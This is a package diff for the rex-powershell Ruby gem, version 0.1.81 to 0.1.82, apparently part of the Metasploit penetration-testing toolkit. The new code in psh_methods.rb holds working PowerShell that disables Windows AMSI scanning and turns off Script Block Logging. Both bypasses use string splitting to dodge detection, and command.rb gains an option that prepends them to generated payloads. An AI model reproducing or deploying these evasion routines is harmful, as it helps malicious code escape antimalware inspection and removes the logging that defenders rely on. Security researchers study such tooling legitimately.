rex-powershell 0.1.81 → 0.1.82

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 52aa59edea1a94ba2fc19092005bab64aeac69ea
-  data.tar.gz: 7d565ada14c7580f8848dca04d4966dc2b666191
+  metadata.gz: 5050ad40885d40a43ab8756d73c94880b17d7666
+  data.tar.gz: 9a4d35a597ab6a991f2be28a403d216e733a124e
 SHA512:
-  metadata.gz: da9f7797acb625600d51a28044d700043d7a219c12f60a289c9b7c312cab5e6852169058bcc06e70fd450c379ad98196800a7c6690cdba579267dc19e175ebfa
-  data.tar.gz: 6d6b7ecc58698b0fcb39a765b15926dfca6dbfa33e398148faffb9d71a122079f24ed613c6821f26981f2802e74bf2edf3c2bac8631e2ad5c81f9ed682dbf6bf
+  metadata.gz: 03c15cfbddd8dc75c2f55e411285798911c9f286c50288412b1a51971036056f311c89e1099be7ea1dd4607139479099e7dd56e181fe6ee0de82ff158cec447a
+  data.tar.gz: 9dd8103e33b749ef55907ae5cc216e12814352480713056ea2fac2befbcd6630ddd096cd0cb3e18a0b6825c4bb6e8861a1566be2de1c2ce1757544781bdd2f78

data/data/templates/to_mem_msil.ps1.template

@@ -64,4 +64,4 @@ $%{var_args}[2] = $%{var_sc}.Length
 
 $%{var_src_meth}.Invoke($null, $%{var_args})
 
-$%{var_tgt_meth}.Invoke($null, @(0x11112222))
+$%{var_tgt_meth}.Invoke($null, @(0x11112222))

data/lib/rex/powershell/command.rb

@@ -316,6 +316,10 @@ EOS
       end
     end
 
+    if opts[:prepend_protections_bypass]
+      psh_payload = Rex::Powershell::PshMethods.bypass_powershell_protections << ";#{psh_payload}"
+    end
+
     compressed_payload = compress_script(psh_payload, nil, opts)
     encoded_payload = encode_script(psh_payload, opts)
 

data/lib/rex/powershell/psh_methods.rb

@@ -85,6 +85,53 @@ module Powershell
       '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
     end
 
+    #
+    # Return mattifestation's AMSI bypass
+    #
+    # @return [String] PowerShell code to bypass AMSI
+    def self.bypass_amsi()
+      %q{
+        $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
+        $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
+      }
+    end
+
+    #
+    # Return cobbr's Script Block Logging bypass
+    #
+    # @return [String] PowerShell code to bypass Script Block Logging
+    def self.bypass_script_log()
+      %q{
+        $GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
+        If($GPF){
+            $GPC=$GPF.GetValue($null);
+            If($GPC['ScriptB'+'lockLogging']){
+                $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
+                $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
+            }
+            $val=[Collections.Generic.Dictionary[string,System.Object]]::new();
+            $val.Add('EnableScriptB'+'lockLogging',0);
+            $val.Add('EnableScriptB'+'lockInvocationLogging',0);
+            $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
+        } Else {
+            [ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
+        }
+      }
+    end
+
+    #
+    # Return all bypasses checking if PowerShell version > 3
+    #
+    # @return [String] PowerShell code to disable PowerShell Built-In Protections
+    def self.bypass_powershell_protections()
+      %Q{
+        If($PSVersionTable.PSVersion.Major -ge 3){
+          #{self.bypass_script_log}
+          #{self.bypass_amsi}
+        }
+      }
+    end
+
     #
     # Download and execute string via HTTP
     #

data/lib/rex/powershell/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Powershell
-    VERSION = "0.1.81"
+    VERSION = "0.1.82"
   end
 end

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-  version: 0.1.81
+  version: 0.1.82
 platform: ruby
 authors:
 - David 'thelightcosine' Maloney